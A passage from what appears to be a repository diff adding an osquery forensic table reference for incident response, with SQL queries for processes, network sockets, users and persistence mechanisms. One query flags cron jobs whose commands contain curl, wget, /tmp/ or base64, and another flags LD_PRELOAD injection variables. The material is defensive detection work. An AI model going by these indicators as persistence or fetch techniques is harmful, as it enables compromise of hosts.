WHEN platform = 'darwin' THEN (SELECT COUNT(*) FROM launchd)
WHEN platform LIKE '%linux%' THEN (SELECT COUNT(*) FROM systemd_units)
WHEN platform LIKE '%windows%' THEN (SELECT COUNT(*) FROM services)
ELSE 0
END AS persistence_count
FROM os_version;
```
## Best Practices for Cross-Platform Queries
1. **Check table availability** before querying:
```bash
osqueryi ".tables" | grep <table_name>
```
2. **Use platform detection** for conditional logic
3. **Test queries on each platform** - column names may vary slightly
4. **Document platform requirements** in query comments
5. **Create platform-specific query packs** for osqueryd
## Reference
- [osquery Schema Documentation](https://osquery.io/schema/)
- [Platform-specific table reference](https://osquery.io/schema/)

479
skills/incident-response/forensics-osquery/references/table-guide.md Normal file
View File

@@ -0,0 +1,479 @@
# osquery Table Reference for Forensic Investigations
Comprehensive guide to osquery tables most relevant for incident response and forensic analysis.
## Table of Contents
- [Process Tables](#process-tables)
- [Network Tables](#network-tables)
- [File System Tables](#file-system-tables)
- [User and Authentication Tables](#user-and-authentication-tables)
- [System Information Tables](#system-information-tables)
- [Persistence Mechanism Tables](#persistence-mechanism-tables)
- [Platform-Specific Tables](#platform-specific-tables)
## Process Tables
### processes
Query running processes with detailed information.
**Key columns**: pid, name, path, cmdline, cwd, uid, gid, parent, pgroup, state, on_disk, start_time
```sql
-- Basic process listing
SELECT pid, name, path, cmdline, uid FROM processes;
-- Processes with deleted executables (malware indicator)
SELECT * FROM processes WHERE on_disk = 0;
-- Process tree
SELECT p1.pid, p1.name, p1.cmdline, p2.pid AS parent_pid, p2.name AS parent_name
FROM processes p1
LEFT JOIN processes p2 ON p1.parent = p2.pid;
```
### process_open_sockets
Network sockets opened by processes.
**Key columns**: pid, socket, family, protocol, local_address, local_port, remote_address, remote_port, state
```sql
-- Active external connections
SELECT p.name, ps.remote_address, ps.remote_port, ps.state, p.cmdline
FROM processes p
JOIN process_open_sockets ps ON p.pid = ps.pid
WHERE ps.remote_address NOT IN ('127.0.0.1', '::1', '0.0.0.0');
```
### process_memory_map
Memory regions mapped by processes (useful for detecting injections).
**Key columns**: pid, start, end, permissions, path, pseudo
```sql
-- Detect suspicious memory mappings
SELECT p.name, pm.path, pm.permissions, p.cmdline
FROM process_memory_map pm
JOIN processes p ON pm.pid = p.pid
WHERE pm.path LIKE '%tmp%' OR pm.pseudo = 1;
```
### process_envs
Environment variables for running processes.
**Key columns**: pid, key, value
```sql
-- Check for suspicious environment variables
SELECT p.name, pe.key, pe.value
FROM process_envs pe
JOIN processes p ON pe.pid = p.pid
WHERE pe.key IN ('LD_PRELOAD', 'DYLD_INSERT_LIBRARIES', 'PATH');
```
## Network Tables
### listening_ports
Ports listening for connections.
**Key columns**: pid, port, protocol, family, address
```sql
-- Listening ports mapped to processes
SELECT lp.port, lp.protocol, lp.address, p.name, p.path, p.cmdline
FROM listening_ports lp
LEFT JOIN processes p ON lp.pid = p.pid
WHERE lp.address NOT IN ('127.0.0.1', '::1')
ORDER BY lp.port;
```
### interface_addresses
Network interface IP addresses.
**Key columns**: interface, address, mask, broadcast
```sql
-- List all network interfaces and addresses
SELECT interface, address, mask, type FROM interface_addresses;
```
### routes
System routing table.
**Key columns**: destination, netmask, gateway, source, interface, type
```sql
-- Check routing table
SELECT destination, netmask, gateway, interface FROM routes;
```
### arp_cache
ARP table entries (detect ARP spoofing).
**Key columns**: address, mac, interface, permanent
```sql
-- ARP cache analysis
SELECT address, mac, interface FROM arp_cache ORDER BY address;
```
## File System Tables
### file
Query file system metadata.
**Key columns**: path, directory, filename, size, mtime, atime, ctime, mode, uid, gid, type
```sql
-- Recently modified files in sensitive directories
SELECT path, filename, mtime, uid, gid, mode
FROM file
WHERE path LIKE '/etc/%'
OR path LIKE '/usr/bin/%'
OR path LIKE '/usr/sbin/%'
ORDER BY mtime DESC LIMIT 50;
-- SUID/SGID binaries
SELECT path, filename, mode, uid
FROM file
WHERE (mode LIKE '%4%' OR mode LIKE '%2%')
AND path LIKE '/usr/%';
```
### hash
File cryptographic hashes (MD5, SHA1, SHA256).
**Key columns**: path, directory, filename, md5, sha1, sha256, size
```sql
-- Hash files in suspicious locations
SELECT path, filename, md5, sha256
FROM hash
WHERE path LIKE '/tmp/%'
OR path LIKE '/var/tmp/%';
```
### file_events
Real-time file system change monitoring (requires file integrity monitoring).
**Key columns**: target_path, action, time, pid, uid, gid
```sql
-- Recent file modifications
SELECT target_path, action, time, pid
FROM file_events
WHERE action IN ('CREATED', 'UPDATED', 'DELETED')
AND time > strftime('%s', 'now') - 3600;
```
## User and Authentication Tables
### users
System user accounts.
**Key columns**: uid, gid, username, description, directory, shell
```sql
-- Users with login shells
SELECT username, uid, gid, shell, directory
FROM users
WHERE shell NOT LIKE '%nologin%' AND shell NOT LIKE '%false';
-- Recent user additions (requires tracking)
SELECT * FROM users ORDER BY uid DESC LIMIT 10;
```
### logged_in_users
Currently logged-in users.
**Key columns**: user, tty, host, time, pid
```sql
-- Active user sessions
SELECT user, tty, host, time FROM logged_in_users;
```
### last
Login history (last command output).
**Key columns**: username, tty, pid, type, time, host
```sql
-- Recent login history
SELECT username, tty, host, time, type
FROM last
ORDER BY time DESC LIMIT 50;
```
### groups
User groups.
**Key columns**: gid, groupname
```sql
-- List all groups
SELECT gid, groupname FROM groups;
```
### user_groups
User-to-group mappings.
**Key columns**: uid, gid
```sql
-- Users in admin groups
SELECT u.username, g.groupname
FROM users u
JOIN user_groups ug ON u.uid = ug.uid
JOIN groups g ON ug.gid = g.gid
WHERE g.groupname IN ('sudo', 'wheel', 'admin', 'root');
```
## System Information Tables
### system_info
System hardware and OS information.
**Key columns**: hostname, uuid, cpu_type, cpu_brand, physical_memory, hardware_model
```sql
-- System information
SELECT hostname, cpu_brand, physical_memory, hardware_model FROM system_info;
```
### os_version
Operating system version details.
**Key columns**: name, version, major, minor, patch, build, platform
```sql
-- OS version
SELECT name, version, platform, build FROM os_version;
```
### kernel_info
Kernel version and parameters.
**Key columns**: version, arguments, path, device
```sql
-- Kernel information
SELECT version, arguments FROM kernel_info;
```
### uptime
System uptime.
**Key columns**: days, hours, minutes, seconds, total_seconds
```sql
-- System uptime
SELECT days, hours, minutes FROM uptime;
```
## Persistence Mechanism Tables
### crontab
Scheduled cron jobs (Linux/macOS).
**Key columns**: event, minute, hour, day_of_month, month, day_of_week, command, path
```sql
-- All cron jobs
SELECT event, command, path FROM crontab;
-- Suspicious cron commands
SELECT * FROM crontab
WHERE command LIKE '%curl%'
OR command LIKE '%wget%'
OR command LIKE '%/tmp/%'
OR command LIKE '%base64%';
```
### scheduled_tasks (Windows)
Windows scheduled tasks.
**Key columns**: name, action, path, enabled, state
```sql
-- Enabled scheduled tasks
SELECT name, action, path, state FROM scheduled_tasks WHERE enabled = 1;
```
### startup_items (macOS)
macOS startup items.
**Key columns**: name, path, args, type, source, status
```sql
-- macOS startup items
SELECT name, path, type, source FROM startup_items;
```
### launchd (macOS)
macOS launch agents and daemons.
**Key columns**: name, path, program, program_arguments, run_at_load, keep_alive
```sql
-- Launch agents/daemons that run at load
SELECT name, path, program, program_arguments
FROM launchd
WHERE run_at_load = 1;
```
### registry (Windows)
Windows registry access.
**Key columns**: key, name, type, data, path
```sql
-- Registry Run keys
SELECT key, name, path, data
FROM registry
WHERE key LIKE '%Run%' OR key LIKE '%RunOnce%';
```
### services (Windows)
Windows services.
**Key columns**: name, display_name, status, path, start_type, user_account
```sql
-- Auto-start services
SELECT name, display_name, path, user_account
FROM services
WHERE start_type = 'AUTO_START';
```
### systemd_units (Linux)
Linux systemd services.
**Key columns**: id, description, load_state, active_state, sub_state, fragment_path
```sql
-- Active systemd services
SELECT id, description, active_state, fragment_path
FROM systemd_units
WHERE active_state = 'active';
-- Non-default systemd services
SELECT * FROM systemd_units
WHERE fragment_path NOT LIKE '/usr/lib/systemd/system/%'
AND fragment_path NOT LIKE '/lib/systemd/system/%';
```
## Platform-Specific Tables
### kernel_modules (Linux)
Loaded kernel modules.
**Key columns**: name, size, used_by, status, address
```sql
-- Loaded kernel modules
SELECT name, size, used_by, status FROM kernel_modules;
```
### kernel_extensions (macOS)
macOS kernel extensions (kexts).
**Key columns**: name, version, path, loaded
```sql
-- Loaded kernel extensions
SELECT name, version, path FROM kernel_extensions WHERE loaded = 1;
```
### drivers (Windows)
Windows device drivers.
**Key columns**: device_id, device_name, image, provider, service, service_key
```sql
-- Loaded drivers
SELECT device_name, image, provider, service FROM drivers;
```
### chrome_extensions
Chrome browser extensions.
**Key columns**: name, identifier, version, description, path, author
```sql
-- Installed Chrome extensions
SELECT name, version, description, path FROM chrome_extensions;
```
### firefox_addons
Firefox browser add-ons.
**Key columns**: name, identifier, version, description, source_url, visible
```sql
-- Installed Firefox add-ons
SELECT name, version, description, source_url FROM firefox_addons;
```
## Query Optimization Tips
1. **Use WHERE clauses**: Always filter results to reduce query time
```sql
-- Bad: SELECT * FROM processes;
-- Good: SELECT * FROM processes WHERE uid = 0;
```
2. **Limit results**: Use LIMIT for large result sets
```sql
SELECT * FROM file WHERE path LIKE '/usr/%' LIMIT 100;
```
3. **Index columns**: Use indexed columns in WHERE clauses (pid, uid, path)
4. **Join efficiently**: Start with smaller tables when joining
```sql
SELECT * FROM listening_ports lp
JOIN processes p ON lp.pid = p.pid; -- listening_ports is usually smaller
```
5. **Time filtering**: Use time comparisons for event tables
```sql
WHERE time > (strftime('%s', 'now') - 3600) -- Last hour
```
## Reference
- [osquery Schema Documentation](https://osquery.io/schema/)
- [Table schemas by version](https://osquery.io/schema/)